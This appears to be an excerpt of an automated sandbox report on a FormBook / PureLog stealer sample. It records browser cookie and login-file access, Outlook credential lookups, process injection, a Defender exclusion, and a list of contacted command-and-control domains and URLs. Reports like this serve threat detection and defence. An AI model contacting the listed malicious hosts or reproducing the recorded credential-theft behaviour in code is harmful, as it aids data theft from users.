                      Source: pDqSqZXvqQcT.exe, 00000007.00000002.4467510840.0000000000CA1000.00000002.00000001.00040000.00000000.sdmp, pDqSqZXvqQcT.exe, 00000007.00000000.2080354333.0000000000CA1000.00000002.00000001.00040000.00000000.sdmp, pDqSqZXvqQcT.exe, 0000000A.00000002.4467756194.0000000000E71000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: pDqSqZXvqQcT.exe, 00000007.00000002.4467510840.0000000000CA1000.00000002.00000001.00040000.00000000.sdmp, pDqSqZXvqQcT.exe, 00000007.00000000.2080354333.0000000000CA1000.00000002.00000001.00040000.00000000.sdmp, pDqSqZXvqQcT.exe, 0000000A.00000002.4467756194.0000000000E71000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                      Source: pDqSqZXvqQcT.exe, 00000007.00000002.4467510840.0000000000CA1000.00000002.00000001.00040000.00000000.sdmp, pDqSqZXvqQcT.exe, 00000007.00000000.2080354333.0000000000CA1000.00000002.00000001.00040000.00000000.sdmp, pDqSqZXvqQcT.exe, 0000000A.00000002.4467756194.0000000000E71000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeQueries volume information: C:\Users\user\Desktop\W3MzrFzSF0.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\W3MzrFzSF0.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Yara detected FormBook
                      Source: Yara matchFile source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000002.2172640781.00000000057E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2172148730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.4467731020.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.4467867908.00000000044F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.4469698131.0000000004C30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.4466768645.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.4467776927.0000000004AB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2173692414.00000000083A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Yara detected PureLog Stealer
                      Source: Yara matchFile source: 0.2.W3MzrFzSF0.exe.5670000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.W3MzrFzSF0.exe.5670000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.W3MzrFzSF0.exe.3d19970.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2068496606.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2070385799.0000000005670000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Windows\SysWOW64\pcaui.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Windows\SysWOW64\pcaui.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                      Remote Access Functionality

                      barindex
                      Yara detected FormBook
                      Source: Yara matchFile source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000002.2172640781.00000000057E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2172148730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.4467731020.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.4467867908.00000000044F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.4469698131.0000000004C30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.4466768645.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.4467776927.0000000004AB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2173692414.00000000083A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Yara detected PureLog Stealer
                      Source: Yara matchFile source: 0.2.W3MzrFzSF0.exe.5670000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.W3MzrFzSF0.exe.5670000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.W3MzrFzSF0.exe.3d19970.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2068496606.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2070385799.0000000005670000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                      DLL Side-Loading                      		612
                      Process Injection                      		1
                      Masquerading                      		1
                      OS Credential Dumping                      		121
                      Security Software Discovery                      		Remote Services1
                      Email Collection                      		1
                      Encrypted Channel                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                      Abuse Elevation Control Mechanism                      		11
                      Disable or Modify Tools                      		LSASS Memory2
                      Process Discovery                      		Remote Desktop Protocol1
                      Archive Collected Data                      		3
                      Ingress Tool Transfer                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                      DLL Side-Loading                      		41
                      Virtualization/Sandbox Evasion                      		Security Account Manager41
                      Virtualization/Sandbox Evasion                      		SMB/Windows Admin Shares1
                      Data from Local System                      		4
                      Non-Application Layer Protocol                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook612
                      Process Injection                      		NTDS1
                      Application Window Discovery                      		Distributed Component Object ModelInput Capture4
                      Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Deobfuscate/Decode Files or Information                      		LSA Secrets2
                      File and Directory Discovery                      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Abuse Elevation Control Mechanism                      		Cached Domain Credentials113
                      System Information Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
                      Obfuscated Files or Information                      		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
                      Software Packing                      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                      DLL Side-Loading                      		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1563494 Sample: W3MzrFzSF0.exe Startdate: 27/11/2024 Architecture: WINDOWS Score: 100 37 www.rtpterbaruwaktu3.xyz 2->37 39 www.54248711.xyz 2->39 41 15 other IPs or domains 2->41 49 Antivirus detection for URL or domain 2->49 51 Multi AV Scanner detection for submitted file 2->51 53 Yara detected PureLog Stealer 2->53 57 5 other signatures 2->57 10 W3MzrFzSF0.exe 4 2->10         started        signatures3 55 Performs DNS queries to domains with low reputation 39->55 process4 file5 35 C:\Users\user\AppData\...\W3MzrFzSF0.exe.log, ASCII 10->35 dropped 69 Writes to foreign memory regions 10->69 71 Allocates memory in foreign processes 10->71 73 Adds a directory exclusion to Windows Defender 10->73 75 Injects a PE file into a foreign processes 10->75 14 vbc.exe 10->14         started        17 powershell.exe 23 10->17         started        signatures6 process7 signatures8 77 Maps a DLL or memory area into another process 14->77 19 pDqSqZXvqQcT.exe 14->19 injected 79 Loading BitLocker PowerShell Module 17->79 22 WmiPrvSE.exe 17->22         started        24 conhost.exe 17->24         started        process9 signatures10 59 Found direct / indirect Syscall (likely to bypass EDR) 19->59 26 pcaui.exe 13 19->26         started        process11 signatures12 61 Tries to steal Mail credentials (via file / registry access) 26->61 63 Tries to harvest and steal browser information (history, passwords, etc) 26->63 65 Modifies the context of a thread in another process (thread injection) 26->65 67 3 other signatures 26->67 29 pDqSqZXvqQcT.exe 26->29 injected 33 firefox.exe 26->33         started        process13 dnsIp14 43 rtpterbaruwaktu3.xyz 103.21.221.87, 49735, 80 LINKNET-ID-APLinknetASNID unknown 29->43 45 www.54248711.xyz 161.97.142.144, 50018, 50019, 50020 CONTABODE United States 29->45 47 11 other IPs or domains 29->47 81 Found direct / indirect Syscall (likely to bypass EDR) 29->81 signatures15

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      W3MzrFzSF0.exe42%ReversingLabsByteCode-MSIL.Spyware.Negasteal
                      W3MzrFzSF0.exe38%VirustotalBrowse
                      W3MzrFzSF0.exe100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      SourceDetectionScannerLabelLink
                      ampsamkok88.shop0%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      http://www.canadavinreport.site/cvhb/?lH_L4=eb9ahS5GFYDOhq0JOiIrfnQwKg301mZRXDTXF/EDnGWOAiF9jJHx+uvzEaHIq78+HHS43fAza3sJA+7AAuSex8cscvdTrTgngauHU4xbCBdC3sDNHF9YUQ2vDY1OdPiGaw==&005PE=aNcLxhD894SLKl0%Avira URL Cloudsafe
                      http://www.70kdd.top/klhq/0%Avira URL Cloudsafe
                      http://www.canadavinreport.site/cvhb/?lH_L4=eb9ahS5GFYDOhq0JOiIrfnQwKg301mZRXDTXF/EDnGWOAiF9jJHx0%Avira URL Cloudsafe
                      http://www.questmatch.pro/z3ox/?lH_L4=XRVN9XS8GrL3N+/sXJw1nASfMdlrVHj65QayKB69AEGBKWegVMYG7P4Sa4h2i8A2rJx8M9mN63brSxfD4lNhVmfI//tpSvw7xSsa4vbhkQtFrYKlL+/JsA82eJgn+fnUtQ==&005PE=aNcLxhD894SLKl0%Avira URL Cloudsafe
                      http://www.matteicapital.online/hyyd/?005PE=aNcLxhD894SLKl&lH_L4=fqlLWWUWU+rKW3EBskUV6SGgNRnmDoU2hpWkksgzCQayp6WkBROPj8SoyGxHGehCRFG0wA/ATtWP72Uz33qX2RXlPUSmGQTIeTj0jYuHFw88ATfT6HkRUZetCKkJWJDjJA==0%Avira URL Cloudsafe
                      http://www.llljjjiii.shop/rsvy/0%Avira URL Cloudsafe
                      http://www.questmatch.pro0%Avira URL Cloudsafe
                      http://www.mrpokrovskii.pro/2pji/0%Avira URL Cloudsafe
                      http://www.70kdd.top/klhq/?lH_L4=AHY/rhT5FAaHaOQwqTnzrcskZO2I+4brO2rEekNoUo4JX0G52JlH+4AuLBXgGUSDwTLgniL6s02sZcl+Gf8+ieDRvxIHzah5xLQe7b3R0zi9v/9+L2XqTgkk9lBsx9pauw==&005PE=aNcLxhD894SLKl0%Avira URL Cloudsafe
                      http://www.acond-22-mvr.click/w9z4/100%Avira URL Cloudmalware
                      http://www.questmatch.pro/z3ox/0%Avira URL Cloudsafe
                      http://www.smartcongress.net/11t3/0%Avira URL Cloudsafe
                      https://www.trtworld.com/#frmActiveBrowsers0%Avira URL Cloudsafe
                      http://www.gogawithme.live/6gtt/?lH_L4=SGA0vAB7ljjiJZBksJb1gqec1i3dMNjZK6uCbLTCC3HP5ur0cn6Abe6/hzp/g4dh4YOAUYGeqr6sPYYs6bnbftG3TST47at8LnD6yWitNli0aOZiiyErkaGZ0ExcXW9KKA==&005PE=aNcLxhD894SLKl0%Avira URL Cloudsafe
                      http://www.rtpterbaruwaktu3.xyz/7yx4/?005PE=aNcLxhD894SLKl&lH_L4=m5A4fx9ZIvMjycGMPfzrz9w2buYwlryi7dKiWry0Mz65334dxjvJlwP/oWrLHd67Yf3RW+voxQmVQwC1SSJQaxXxx2OcYdqfi9qgQF3SHTlHdwLQ+7ODGDyF3UwRNLbgag==0%Avira URL Cloudsafe
                      http://www.acond-22-mvr.click/w9z4/?005PE=aNcLxhD894SLKl&lH_L4=68uIQ7XuXrYyzH38eAwIlcni4Dy1meyAWnVnC6Q+cYkMiUv2YFR7SOjLNBcUXcnE4X2lRQ1sPBZfnUN4AIhfbeeWLm23HuUFOBNObgSjIwBxlFn7Rit3IOIP+ZrZsKx+FQ==100%Avira URL Cloudmalware
                      http://www.llljjjiii.shop/rsvy/?lH_L4=r8TqL8lVmKhCyKg91gAe8j+3yCz/CgsH+3nLHstVk9be2gQWJEXa9NKMMz87e0tjGxvoPEvy6SLnfdtsmt5rRtv3mUECyzOywyqf8KPBYdutbjoA70JSrcAbMdNFzubz8Q==&005PE=aNcLxhD894SLKl0%Avira URL Cloudsafe
                      http://www.gogawithme.live/6gtt/0%Avira URL Cloudsafe
                      http://www.mrpokrovskii.pro/2pji/?005PE=aNcLxhD894SLKl&lH_L4=67iA4TPPdQ9nErotgeyL+Ya2EPxYwBsEvI1Cgt9ewFwChBdA65DXjWpTSdFtRBveCaF8GV/HBCb4pJoPY3YT9yZ96oMLsgfQ1G9JdO2EtcszdOb7L0lpI3ZCf/THH8NE8w==0%Avira URL Cloudsafe
                      http://www.ampsamkok88.shop/huvt/0%Avira URL Cloudsafe
                      http://www.ytsd88.top/egqi/?lH_L4=b73RclDzsQx9LNfVP0mvFBo4qCNcPXUUZl7U/15lM3StUAJAIINJCW5I+z7gQYXdXqIUVixe3UGJ61mgF9Q8ksZ6wdRJyvWXXW5woHrN3vUqlgOg2KxD9o0N2wzkcF8JdQ==&005PE=aNcLxhD894SLKl0%Avira URL Cloudsafe
                      http://www.ytsd88.top/egqi/0%Avira URL Cloudsafe
                      http://www.matteicapital.online/px.js?ch=20%Avira URL Cloudsafe
                      http://www.ampsamkok88.shop/huvt/?005PE=aNcLxhD894SLKl&lH_L4=yxXU4HpAbhaf+OkoYuih9i/g9QEw7HNYYa9VbkZ8i0eD7fFgPye8gqdK566WGP/XcS8CMkxomySFTtdD4uVPdmXJU5Nrv7tPj8ooy4ycuPqfNaJACPLoENW1kFMy7/pznQ==0%Avira URL Cloudsafe
                      http://www.matteicapital.online/px.js?ch=10%Avira URL Cloudsafe
                      http://www.54248711.xyz/jm2l/?lH_L4=M21ir/NSFfGrmB4z/u+JMR/HgMrfgTX4RaXyCSFwSSwtaZs5yH0UEptpPba+9Px3pipv0aZDZRRy+Xo/jJmyh9BQr7AsY9ps2ywsUHN31DffyA3sdKxmASYgpvofv0k0Sg==&005PE=aNcLxhD894SLKl0%Avira URL Cloudsafe
                      http://www.canadavinreport.site/cvhb/0%Avira URL Cloudsafe
                      http://www.54248711.xyz/jm2l/0%Avira URL Cloudsafe
                      http://www.matteicapital.online/hyyd/0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      www.llljjjiii.shop
                      		8.210.114.150
                      		truefalse
                        		high
                        www.54248711.xyz
                        		161.97.142.144
                        		truetrue
                          		unknown
                          www.gogawithme.live
                          		209.74.77.109
                          		truefalse
                            		unknown
                            www.canadavinreport.site
                            		185.27.134.206
                            		truefalse
                              		high
                              www.questmatch.pro
                              		172.67.138.37
                              		truefalse
                                		unknown
                                www.acond-22-mvr.click
                                		199.59.243.227
                                		truefalse
                                  		high
                                  ampsamkok88.shop
                                  		3.33.130.190
                                  		truefalseunknown
                                  www.mrpokrovskii.pro
                                  		109.70.26.37
                                  		truefalse
                                    		high
                                    smartcongress.net
                                    		146.88.233.115
                                    		truefalse
                                      		unknown
                                      www.matteicapital.online
                                      		208.91.197.27
                                      		truefalse
                                        		high
                                        70kdd.top
                                        		38.47.232.124
                                        		truefalse
                                          		unknown
                                          www.ytsd88.top
                                          		47.76.213.197
                                          		truefalse
                                            		high
                                            rtpterbaruwaktu3.xyz
                                            		103.21.221.87
                                            		truetrue
                                              		unknown
                                              www.ampsamkok88.shop
                                              		unknown
                                              		unknownfalse
                                                		unknown
                                                www.70kdd.top
                                                		unknown
                                                		unknownfalse
                                                  		unknown
                                                  www.rtpterbaruwaktu3.xyz
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown
                                                    www.smartcongress.net
                                                    		unknown
                                                    		unknownfalse
                                                      		unknown

                                                      Contacted URLs

                                                      NameMaliciousAntivirus DetectionReputation
                                                      http://www.mrpokrovskii.pro/2pji/false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.70kdd.top/klhq/false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.matteicapital.online/hyyd/?005PE=aNcLxhD894SLKl&lH_L4=fqlLWWUWU+rKW3EBskUV6SGgNRnmDoU2hpWkksgzCQayp6WkBROPj8SoyGxHGehCRFG0wA/ATtWP72Uz33qX2RXlPUSmGQTIeTj0jYuHFw88ATfT6HkRUZetCKkJWJDjJA==false
                                                      • Avira URL Cloud: safe
                                                      		unknown
